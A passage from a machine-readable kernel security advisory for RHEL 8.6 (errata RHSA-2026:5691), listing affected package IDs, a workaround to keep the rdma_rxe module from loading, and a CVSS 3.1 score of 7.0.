            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
          ],
          "restart_required": {
            "category": "machine"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:5691"
        },
        {
          "category": "workaround",
          "details": "To mitigate this issue, prevent the rdma_rxe module from being loaded. See https://access.redhat.com/solutions/41278 for instructions on blacklisting kernel modules.",
          "product_ids": [
            "BaseOS-8.6.0.Z.AUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "BaseOS-8.6.0.Z.AUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
